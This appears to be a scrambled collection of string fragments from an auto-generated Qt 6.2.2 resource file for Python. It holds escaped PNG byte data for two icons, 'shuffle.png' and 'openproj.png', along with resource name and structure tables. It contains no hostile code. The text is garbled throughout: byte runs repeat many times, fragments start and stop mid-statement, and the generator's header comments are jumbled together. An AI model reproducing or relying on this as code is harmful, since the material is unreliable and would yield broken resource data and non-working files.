"\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03, qt_resource_struct,",
"\\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\",
"]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\",
"6.2.2 # WARNING! All changes made in this file will be lost! from",
"sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\",
"\\x07\\x90\\xdd\\xa7\\ \\x00o\\ \\x00p\\x00e\\x00n\\x00p\\x00r\\x00o\\x00j\\x00.\\x00p\\x00n\\x00g\\ \" qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\",
"\\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\ -\\xf4\\x85\\xd1;\\x9aNX\\xe3~\\x7fEI\\x9c\\x09J\\ &\\xa5A6\\xb6\\x90\\x89\\xc7\\xb50\\x91\\xa4A\\x0c\\xb6\\x91\\ w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\",
"ImageRead\\ yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\",
"object code (Python 3) # Created by: object code # Created by: The",
"= b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\ \\x00s\\ \\x00h\\x00u\\x00f\\x00f\\x00l\\x00e\\x00.\\x00p\\x00n\\x00g\\ \\x00\\x0c\\ \\x07\\x90\\xdd\\xa7\\ \\x00o\\",
"yq\\xc9e<\\x00\\x00\\x02}IDATx\\xda\\x8c\\ \\x93\\xdfK\\x93Q\\x18\\xc7\\xbf\\xef\\xd9\\xd9t3s\\xad\\x9c\\ LG\\xcd\\xb5i\\x18\\x85\\x91\\xd4\\x8d\\x10\\x98AR\\x17A\\ ^ue\\x17\\x15A\\x7fB\\x16DPDw]G\\xd7\\ F\\x91A\\xdeu\\x11\\x95\\x11\\x1a\\x94\\x09\\x22-\\x86\\xe9\\x9c\\ ,$+u\\x93\\xf7=?z\\xce\\xd9\\xa6.\\x08:p\\ 8\\xcf\\xf9\\xf1|\\xdf\\xcf\\xf7<\\xefq&\\xef\\xc06\\xc7\\ \\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\",
"\\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\",
"object code # Created by: The Resource Compiler for Qt version 6.2.2 #",
"*\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\ sER\\xd0q\\x9c>\\xdc\\xb7:\\xb6]\\xc3\\xf0f\\xbd\\ ]\\xeb\\x827\\x9f|\\x19\\xc2\\x98B\\x12\\x09\\xaf\\xd3p\\xfc\\ @m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\",
"0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name =",
"6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\",
"@m}Z\\xb7\\xcd\\xef\\x89\\x5c\\xfd\\xcc\\xbc\\xb6\\x03y\\x0f\\ \\x91\\x10\\x10\\x05v\\xaa\\xb9\\xde[\\xb3\\xda\\xe7.w)\\xa2\\ K\\x00AL$(\\x1c\\xe9X\\x13\\x1c\\x7f:?\\x84\\x09\\ \\x12\\x12\\x7f\\x0b*@\\x1c\\x13T\\x9f[Q\\xf7\\xb4Vz\\ \\x1f\\xbc\\xf82\\xecq\\x8b\\x81\\xbd;\\xfckL\\x0a\\xb2M\\ \\x1d0\\xc1A\\x0d\\x1c\\xa0\\xd4\\x82|^\\x023\\x9f/\\x5c\\ QB!\\xc27&\\xa2R\\xc0_VV[U\\xea\\x8b\\ \\xccgVY9\\xa3\\xb5sg\\xa0L\\xd7lQ\\x94\\x80\\ }\\x8e%\\xbeEb?\\x93z\\x96\\x9a=\\xdd\\xcd\\xc1\\x1b\\ \\xf7>\\xbeFA/\\x88\\xb2|Wh;\\xfb\\x81\\xeb\\xb0\\ \\x11\\xdfzhU\\xa5k\\xbb\\xb6\\x9c9\\xd6\\xd2T[\\xa9\\ *\\xaab3\\xcby\\xfb)6\\xbb\\x94\\xcc>\\x12\\x08\\x19\\ \\xc1\\x0a]\\xe6\\xa7\\xf2`YUC\\x92\\xa2\\x80\\x94I&\\",
"yq\\xc9e<\\x00\\x00\\x03\\x0fIDATx\\xda\\x8c\\ S[k\\x13A\\x14>;{K\\xd3&\\xbd\\xc4Vk\\ \\xbc\\xa4\\x17\\xac\\xb4\\xd6V#R+j\\xa5*\\x0aZh\\ \\xc1\\xe2\\x83\\x0f>\\xf5A,\\x14\\xfa'\\x04\\x1f\\x14\\x04\\xa1\\ \\x05\\x8b`|T\\xa1*\\xa8\\xf5\\x8a (j\\xbd\\xd2\\x0b\\ \\x8dI\\x89\\xb76ib\\x93\\xddl2\\xbb;\\xeb\\x99\\x90\\ *\\xfa\\xe4\\xc0\\xb7s8\\xfb\\x9d33\\xdf9G\\xe8\\x1a\\ [\\x00\\x10\\x04XY\\x0ec`\\xdb6\\x18\\x9a\\x06\\x92,\\ \\x03\\x11\\xc5\\x82_QU\\xa4\\x09#h>\\xb3,+d\\ \\x99&X\\x94\\x82\\x04\\xff\\xb9L\\x0c \\x84\\x04\\xd1\\x0c\\x16\\ ]!\\xfe\\xe1\\x09\\xce\\x80\\xe3\\xd4\\xe1\\x9eFD\\x10\\xcf\\x11\\",
"\\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\",
">o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\",
"Created by: The Resource Compiler for Qt version 6.2.2 # WARNING! All changes",
"Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\",
"b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def qInitResources(): QtCore.qRegisterResourceData(0x03,",
"w\\x0e\\xd1\\x80\\x87\\x85h.\\x07\\x1c$\\x9dL*\\x88\\xed\\ Z*uQ)\\x11\\x1b\\xf4\\xba:\\xcf$UA7(\\ ]H\\xe9Y\\xaf\\xcf\\xfb\\x15\\x83\\x060\\x9eW\\xaa\\x03Q\\ \\x8d\\x09\\xf6S\\xc3\\x00}y\\x19DyK\\xdf%\\xaf\\xa7\\ d\\xb0\\xbaiC[\\xba\\xbd=\\x10a.REL;\\ \\xf1\\xf2\\x83nl\\xda<-\\x06\\xd6I.\\xc1\\xae\\xa2Z\\ 6h\\x199\\xb6\\xaf\\x7fwcx2\\xcc\\x93P\\xc6X\\ T(=q\\xf5\\xd5\\x91\\xd3\\xfd\\xc1\\xdbi\\x05L,m\\ \\xb5m\\x98t\\xe2\\xd1\\x0f\\x82?\\xd5\\xc3\\x07\\x96\\x16\\x05\\x97\\ D\\xb0L\\x1e\\x19\\xc0\\x8bjEu\\x80m\\x15\\x00\\xb1k\\ \\xb7\\xe6\\x0a}`b;N\\xe7\\xf1\\x08=\\x99g\\x91\\xe8\\ \\xcf\\xe5wS\\x8b\\x8c\\xd2+n\\x8f'\\x9a\\xbds\\xbf\\xdb\\ \\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\",
"\\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\ \\x0d\\xd7\\xa0\\xc7\\",
"qt_resource_struct = b\"\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\ \\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x03q\\ \\x00\\x00\\x01}\\xe0D>B\\ \\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\ \\x00\\x00\\x01}\\xe0D>B\\ \" def",
"\\x8a\\x83\\xb7\\x9e \\xf2\\xbb\\x84\\x9d\\x9a\\x12\\x94-e\\xf9\\x7f\\ 0%\\xcb\\x16\\x0a\\xf8J\\x14\\xa6Mg\\xb3\\xf8D\\x14U\\ \\x01\\xb7T\\xaa\\xe3\\x14\\xd7S\\x8fL\\xcd!\\x9fz\\xf5t\\ 5q\\xa0\\xa7\\xbeiw\\xccoJ\\xd7\\xecW\\x8867\\ \\xdb\\x84\\x16\\xb2P\\xf3$\\xe8\\x97^Y^np\\xaa\\x0b\\ \\xa7\\x0e\\x03\\x83\\xc7q\\x8e\\xde\\xd1@$\\x1a\\xefL\\x1d<\\ \\x96x\\xfcl\\x8c=\\x98\\xda\\xfb\\x9c\\x05\\x02%\\x871\\xf9\\ \\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \"",
"\\xf7\\x93T\\xc5\\xe2\\x02\\xafY\\xd0\\x18\\xa5\\xaa\\x8c.\\xe6r\\ \\xdd\\x0b\\xf3\\xb9\\xb3\\x8d\\x1c\\xb1b&s\\x9f\\xb6\\xbc\\x7f<\\ \\xeb\\xd2\\x1f\\x01\\x06\\x00\\xd2\\x97^|\\x9f\\xc2\\xaf\\xc8\\x00\\x00\\ \\x00\\x00IEND\\xaeB`\\x82\\ \" qt_resource_name = b\"\\ \\x00\\x05\\ \\x00o\\xa6S\\ \\x00i\\ \\x00c\\x00o\\x00n\\x00s\\ \\x00\\x0b\\",
"!\\x84\\xc3\\xc56\\x02%=H\\xe1U\\x0c9h\\xd0.\\ \\xd6\\x96V\\xa0\\xe9p\\x7f\\x84C\\x16\\x94%\\xec\\x0f\\x92\\x90\\ \\xdea\\x04\\xd8v\\x0b\\x5c\\x09\\x22\\x10e\\x02\\x87\\xf9\\x10T\\ .\\xae\\xa4\\x1a\\xed|qm\\x05=\\x1d\\x1d6\\x1e\\x9f\\x9e\\ &\\x818\\x84\\xe71.j,\\x88-\\x0b\\xd2G\\xb8\\x02\\ 3\\xb9\\x9c\\xf1\\x8a\\xb6\\xb66L\\xcc\\xce\\xda;\\xb0Wd\\ ,X\\x81\\x1a\\x02\\x0f\\xaabA\\x99;\\xa0\\xc3\\xe9\\xd6V\\ ;\\xff^,\\xe2H:m\\xe3\\x89\\x99\\x19\\x22\\xd0e\\x81\\ \\xcf\\xdf\\x80\\xaex\\xe5\\x0e\\x08_\\x8a\\xea%\\xfa\\xac\\x9dL\\ >o\\x85b\\xb1\\x18>f2\\x9b\\x04\\xa6\\x22\\x1e\\x09\\xb0\\ \\x1b#\\x80\\x11\\xf1\\x04\\x02\\xcaZ\\xf0*\\xdd\\xc4\\x0a\\xc9\\x96\\ \\x16\\xa4\\x88b\\xc3uq(\\x99Dw\\x85\\xc2\\x10X\\x01\\ \\x8a\\x83\\xb7\\x9e",
"\\xd7\\xd4Xn\\xae\\xf5\\xbb-O\\x99\\x92#\\x12a\\x98\\xcc\\ `\\x00\\xb4XFA\\xec\\x19\\x19\\xc1\\xeb\\xb4\\xa3\\x1dG\\xbc\\ G\\x85\\xaf\\x93T\\xf8\\xb5\\xea.\\x01\\xf0mjD\\xf1v\\ \\xa1\\x9f\\xbf\\xbf\\x1cA\\xd6\\x0f\\x9cl\\x8c\\x8d\\x86\\xe6\\x907\\ \\x8e\\xe2>\\x16\\x84\\xa6\\xa38A\\x7fz\\xde\\x99\\xbd\\xfd\\xd7\\ \\x0c\\xc8-\\xbd\\xbfm\\xe4\\x9e/p\\x123\\xe3l\\xfa\\xd6\\ c{q\\x8a7a\\x012\\x1f8\\x84\\xab\\x08\\xb5\\xb8s\\ \\xbf\\xb8\\x92\\x80t\\x0e\\x1f\\x84\\x5cj\\x96\\xbd\\x19\\xe3\\xf3\\x92\\ A\\x18+\\x09H\\x91(\\xfd\\x03R\\xc4\\xcab|0\\x11\\ \\x5c\\x00\\xca\\xed_\\x02\\x0c\\x00\\xa6=o\\xdb2\\xe1%J\\ \\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\ \\x00\\x00\\x02\\xdb\\ \\x89\\",
"\\xc1E\\x1a\\x12\\xf8\\xbf6\\xa75\\x1e\\xdd\\xdb\\xb8\\x09\\xae+\\ +\\xb4\\x90\\xec\\x1a\\xbc{}=?\\x0bGi\\x84\\xf6\\xb4\\ #\\x18\\x8e\\x83\\xf9\\x02\\xb5\\xa9\\x9cc\\xf2\\xe1\\x85\\xdb#\\xee\\ Py\\xaa\\xd4\\xe6\\x16k\\x88\\xa6)q?\\xdc\\xd5\\x02\\xd6\\ \\xf3_0\\xfe\\xf6\\x0d\\x9c\\xc4\\x99\\x9a|\\xc7\\xef\\xc7\\x07\\xef\\ \\xf4\\xd1y\\xb5\\xef2M\\x97\\xb8\\xd4[\\x02J\\x0ah\\xcf\\ \\x03\\xaf\\x0b#\\xdc\\xd9\\x8bX\\xc1A{\\xef%\\x84B!\\ 0\\xc66\\x0f\\xf6\\x9f\\xbc6@\\xc3\\xc0\\xf9\\xe1\\xe1\\xab\\x5c\\ n\\x11\\xf8\\xb4\\x940\\xdd6!\\xf0b\\xa9\\x84\\xb1\\xd7?\\ 